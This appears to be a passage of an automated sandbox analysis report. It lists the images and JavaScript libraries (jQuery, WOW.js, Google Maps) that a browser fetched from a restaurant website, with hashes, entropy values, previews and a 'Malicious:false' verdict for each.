                                                                                                                                                    SHA-512:07ADCC34E8BD20955C8BD9196927AE8A102E77E2AE2D9732CDB9681BAA5EB21EC86A99AE6721CD465310A87560500DD568CA8C9003C14956EEB59ACB469E3597
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Marinated_Chicken_tenderloin.png
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):46125
                                                                                                                                                    Entropy (8bit):7.660388171094493
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:RontNcvC9+7DtNcvC9WL8lYy6BmLXNz8BiqP9RyNZ6jez4Yo724n1:RotNN9+NN9pl+IXh8p81Yy4n1
                                                                                                                                                    MD5:A9B5B9537850FC450D87B1D69B880FC5
                                                                                                                                                    SHA1:6CE95C479A268D8B19CAF6B4C92B37430D1496BC
                                                                                                                                                    SHA-256:66E64B9C265F8801B5F4CF589BFFAA83D986F29BAB9E4750DB17F3A1D2CA8655
                                                                                                                                                    SHA-512:65B41E0A3114B10712ECF979E88F05A4D4A2DE9CF6195C593EC1B41A801259A592B3D3D6D152FB2FF93455D5A8B18BF1237D243A17E2141D7CDEE97A77911EE6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-04.jpg
                                                                                                                                                    Preview:.... .Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:51:55....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................46..........46..........46..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................<...-....2023:08:19 16:29:34.2023:08:19 16:29:34.+10:00.+10:00.+10:00...........`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):37903
                                                                                                                                                    Entropy (8bit):5.933755200420351
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:0vdDi9/U5p0HYY1QVcJh/cZXuhwsmDEcDG:E7yYY+AhwuhFB
                                                                                                                                                    MD5:9361873A04E8A3E2574F083656AF61CE
                                                                                                                                                    SHA1:30E4F9A7559322ACC6BC5399E9C371EC28B2A748
                                                                                                                                                    SHA-256:E72945AA887DD8A681AE2675482715B70D66394F6F43638BAAA8CC2A8A3124A6
                                                                                                                                                    SHA-512:0CFA6A37AC9B47764292D90E5149B3945BDB47532B949BF9DA365D8AC3CE1756FA4204678CAF3558264D47022FF06E69FD89234EC7FFD2D1FA3F37645BE83F1B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Potato_Borani.png
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 94 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):23636
                                                                                                                                                    Entropy (8bit):4.727040621459664
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:YftDetyVLkc25HaYX0ek1/6AH81F0NktlhDezI:mtCEVLkc25UZ1S+8gkxKzI
                                                                                                                                                    MD5:98304057D00F6C3FFC339E2F85B0BDDF
                                                                                                                                                    SHA1:D040B701A67DAD1AAED3B603967E364EEE2BA9D5
                                                                                                                                                    SHA-256:3EE7DC5F24A98212CE2EF49EC1D69B50BE0ADAEDDF220F41F32C0354053256C6
                                                                                                                                                    SHA-512:F83EC709A6FA180A950240C33CFFA96992BE324D55780A203DDF4CD0CA3BAA5071697270ECCCFB32AD9F7A7BB254A5707D9744789FCE6BE22D28580BC027543D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...^...d......3......pHYs...............8%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T16:12:38+05:30</xmp:CreateDate>. <xmp:ModifyDate>2022-07-17T16:24:27+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (906)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2675
                                                                                                                                                    Entropy (8bit):5.3343911471610905
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:D1+kqj0watiHZDYWcjPlmVoTimWyWCk5OhcKMy01FiSxvQhIKsoXwyRn:D1+Z0waH5PQlldO6KMSSxtrewyRn
                                                                                                                                                    MD5:41E499E0599AB53FCFC0C2CACD6520BF
                                                                                                                                                    SHA1:B79D0C9317CF5BE6F5353B02E07B842FB4B6E48D
                                                                                                                                                    SHA-256:D0713279F74A920D9CF7143B4B34F69EF184BF2E0060CF3AC30AE2A993F7761D
                                                                                                                                                    SHA-512:D3591133A3475D456A68B2DA8E916C516AC63774FD9F046668A6BA442E32784C59971EF27D1FD1D3365AB05B37F9F8AEBDA88531340BA93E53060577D3166738
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('search', function(_){var wva=function(){},WB=function(a){this.setValues(a);_.Qi("search_impl")},yva=function(a){let b=_.nl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.fi,c=e.zoom)});if(c===-1)return[];const d=[];a.Du().forEach(e=>{e.a&&e.a.length>=2&&d.push(new xva(e,b,c))});return d},zva=function(a){const b=[];a.data.forEach(c=>{b.push(...yva(c))});return b};_.Ga(wva,_.rk);var Ava={["1"]:{}},xva=class{constructor(a,b,c){this.Jp=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=Ava;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.Rl(new _.cm((this.Jp.x*256+this.source.a[0])/a,(this.Jp.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.Vl(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 1092x1600, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):232926
                                                                                                                                                    Entropy (8bit):7.958495048105757
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:vvKcQNC9Y6Kbmv/mAxloGwoJ1WXHGZHeArBT/54z+qlFsVQ:0NC9ga/BHghXHGZHesT5kbFsVQ
                                                                                                                                                    MD5:17881FF4758E1251CB13824EE5D5A03F
                                                                                                                                                    SHA1:F8503A4765FE94C5B132DB8568F1D4C45EEFF8B4
                                                                                                                                                    SHA-256:8530619CC93908A2E5C18C46A2E2FD9E74B2A3312304DE55B60AFF992B09038F
                                                                                                                                                    SHA-512:9C85EC51B2AE71EA9FF5AE6B701CD659D875A63CA93F8A8CC83A9257799BE2312835603FA5DAE521E84F6F6B6014B84CAAAFFE0155AA11943C653636AA513B11
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_4.jpg
                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:27 14:29:47.............0221.......................D...........@...............................r...........z.(.................................b.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................m.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...i...UCel..?)R.wN..fg..,W...D.m.D.....J,.!.qL...4..Jf..=...uc.D.X......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 150 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):46099
                                                                                                                                                    Entropy (8bit):6.4159642624291635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:xcdDivVcLU5SabT9ItEOgHmQ36rFe/8v9T+QoY:+PabTOtEOgGa6Y/8vRR
                                                                                                                                                    MD5:BB9A21806151B625483DD47A74CFBDEA
                                                                                                                                                    SHA1:5D627946B288B0D1A43E498FF441DEF3A59C6820
                                                                                                                                                    SHA-256:D83ABAE4879503FC22359859C95EAD51842CF09E5AC028713BCABB956C7ACA28
                                                                                                                                                    SHA-512:FB8BAF18B417FD236FDB7F6E02128E877369795A4C994F816DD7F08E93FFA4614D5F501711E76747186A97F6E8DCC37153927469C4C89CE0A8312BEB40E22651
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.......K.......~.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):280364
                                                                                                                                                    Entropy (8bit):5.067215048941603
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:V0Hh4V/Y+TCtlIhTze/RZcYmDvzK8m/7EtPx+WI+Y7cFys/CL/+uQxN0IPfKuGAv:atZcYmDhOgPx+WI+Y7cFycuq1PfQAv5B
                                                                                                                                                    MD5:11C05EB286ED576526BF4543760785B9
                                                                                                                                                    SHA1:7FAA15A054093F3B5D674E63B6567C835A6FA217
                                                                                                                                                    SHA-256:5A93A88493AA32AAB228BF4571C01207D3B42B0002409A454D404B4D8395BD55
                                                                                                                                                    SHA-512:B096B9296AB717DF5039E8A350E9BD3BE0600E056DCEB58105A819B63956EC5DC8E3B34ED4E68D26F6EEB7EF4A38F9A336BE166F76E5538BD0890762F9993AC2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/jquery/jquery-3.4.1.js
                                                                                                                                                    Preview:/*!. * jQuery JavaScript Library v3.4.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2019-05-01T21:04Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 1092x1600, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):232926
                                                                                                                                                    Entropy (8bit):7.958495048105757
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:vvKcQNC9Y6Kbmv/mAxloGwoJ1WXHGZHeArBT/54z+qlFsVQ:0NC9ga/BHghXHGZHesT5kbFsVQ
                                                                                                                                                    MD5:17881FF4758E1251CB13824EE5D5A03F
                                                                                                                                                    SHA1:F8503A4765FE94C5B132DB8568F1D4C45EEFF8B4
                                                                                                                                                    SHA-256:8530619CC93908A2E5C18C46A2E2FD9E74B2A3312304DE55B60AFF992B09038F
                                                                                                                                                    SHA-512:9C85EC51B2AE71EA9FF5AE6B701CD659D875A63CA93F8A8CC83A9257799BE2312835603FA5DAE521E84F6F6B6014B84CAAAFFE0155AA11943C653636AA513B11
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:27 14:29:47.............0221.......................D...........@...............................r...........z.(.................................b.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................m.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...i...UCel..?)R.wN..fg..,W...D.m.D.....J,.!.qL...4..Jf..=...uc.D.X......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (8385)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8415
                                                                                                                                                    Entropy (8bit):5.104931068425687
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:UrZgL1xvPV6GqKgR6TYLWHFMLJA6pOROVEE1fosvGeaMozHImBaoqbl:Ury9PVfIFrlAJROVEEdos+eatzHILoA
                                                                                                                                                    MD5:36050285BFEEB7395752F0F9BBC08273
                                                                                                                                                    SHA1:5924F7BBBF1DFA3F0926851D01F782F23A59E805
                                                                                                                                                    SHA-256:0EC632E6AB02D4FDD514DA7F5EDC74AA28C9D4C71AF76F1C8B93A1FBA85BCC69
                                                                                                                                                    SHA-512:BF887E087C52583114B77BFB417D7DFFA0EE8634D39155AF14591A24B2ADD9EF4C8A0C0555364122800D07A55F5F1FB0C723B39541B069A437FF558DDBF380A3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:/*! WOW - v1.1.3 - 2016-05-06.* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return b;return-1};b=function(){function a(){}return a.prototype.extend=function(a,b){var c,d;for(c in b)d=b[c],null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a.prototype.createEvent=function(a,b,c,d){var e;return null==b&&(b=!1),null==c&&(c=!1),null==d&&(d=null),null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.createEventObject(),e.eventType=a):e.eventName=a,e},a.prototype.emitEvent=function(a,b){return null!=a.dispatchEvent?a.dispatchEvent(b):b in(null!=a)?a[b]():"on"+b in(null!=a)?a["on"+b]():void 0},a.prototype.addEvent=function(a,b,c){return null!=a.addE
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 60 x 51, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):19306
                                                                                                                                                    Entropy (8bit):3.280100421018807
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:1SkkSKqRv+qHSfAIRXc06Egs9QwydK608+9i:UHSKpcPqs06Ey08+8
                                                                                                                                                    MD5:A459E2E1A972630B19FE5FD331328022
                                                                                                                                                    SHA1:C7FF8D81BABB659BE978316EAF4D33911983E885
                                                                                                                                                    SHA-256:3F5E0123B53D9D33AE3DF577B2747584DB8463A3E98AE958336DA1BB911325AF
                                                                                                                                                    SHA-512:214781B05EE33A4210048D4AF77EB76781FBA0881608FAAC0C8D82235241570864940E89ECEBE752CA65439F5DF956874249180B1C6056D6ED3E5A3C5BAEABFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_extra.png
                                                                                                                                                    Preview:.PNG........IHDR...<...3......k.....pHYs...............?.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <dc:creator>. <rdf:Seq>. <rdf:li>VectorStock.com/12168411</rdf:li>. </rdf:Seq>. </dc:creator>.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 516, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1271200
                                                                                                                                                    Entropy (8bit):7.982751134430842
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:m33QyD15+0vP0cJLHfM/hH/xjgYRtwMrXo2PyHl4aA/wdIlZBevPxrAE:m33LV0KL+iOXTPVis20E
                                                                                                                                                    MD5:3E757C3E05AF7C01BF79DAE12863CD2D
                                                                                                                                                    SHA1:7EC39B15082B979E049374E6D1E15A197CECC729
                                                                                                                                                    SHA-256:33DD95B31144C4BA2180CD2A791AA124CFA99455BC4CB9798B4DAE936EC23966
                                                                                                                                                    SHA-512:4C6163B1F2BB4B09666E89CAE719FD78100F13F6ECDC4B0450692BFF9D510F8C019388F56597A1ACD3CBECFFCD849DD3C40B3369C43DCB4D05CB99148D269652
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_dineMenu_image2.png
                                                                                                                                                    Preview:.PNG........IHDR.............h.......pHYs...............A.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:616bbda8-0d05-11ed-86e7-ddf6a1902901</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:9c884f13-0278-03
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (4599)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):242785
                                                                                                                                                    Entropy (8bit):5.694550757163063
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:tYjmEMff7T2m2xbBx+Q7k9/u+3WZLo9pFZt9:tAmdwxvz7ko4WZLo9pLH
                                                                                                                                                    MD5:9C7F2BF38E74C943D9D73E38B1042544
                                                                                                                                                    SHA1:432C5C2CB5A5B58C35114BFBBEAE3C701BC3AC16
                                                                                                                                                    SHA-256:E3BAB8703D23B4A6342BB78CE8E9025EA8673C1C22C26A29BFFFF4A5184CC521
                                                                                                                                                    SHA-512:371841087F95881EE45F51E09D5599659C8265F0A8A7731DB8FC429CA793B59141077C038CD0904AAD91B85268EE6FDCEC3B98700A11FA986236843E6C6FBD7B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.gstatic.com/maps-api-v3/embed/js/58/6/init_embed.js
                                                                                                                                                    Preview:(function() {'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 70 x 49, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17444
                                                                                                                                                    Entropy (8bit):2.8585346832948297
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:cSdb8kEWm+L+9xNX7sc5FpISlVnkAiesbOoerPAi1:cSKk6Dn5PzkYoGh1
                                                                                                                                                    MD5:EAED5BD1DABF13491302CB5960F21F93
                                                                                                                                                    SHA1:49123D52EE03E8B92CAFA08619B38726262A21F1
                                                                                                                                                    SHA-256:B3965934B37289BCEAB581771C865CA6385BBD852D2BA3824337E09DF13461A5
                                                                                                                                                    SHA-512:DD3E1BD7E8904EA785D9CF3A342229342FD4260C547938759EFF9E368CC138E68EB2E8ECE39E4898E35DB9D3E874DC3992CBB73E9B6912BC5BCD91672CBC944E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...F...1.....g.......pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:36:24+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=452, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=678], progressive, precision 8, 678x452, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):73728
                                                                                                                                                    Entropy (8bit):7.882650903979544
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:4YzhUYzhOUNN94ePqbdzqsSdPWk6vLVmlvcjfp1p+iqspvr1:5VpT9lqb49lWk6Dk9cLp1oirvR
                                                                                                                                                    MD5:92EBB26F2A57A0D5EF3FFC7C0A3A666A
                                                                                                                                                    SHA1:E1CF4A6A0883EEEFB4DDE703B737C9E39FA23A45
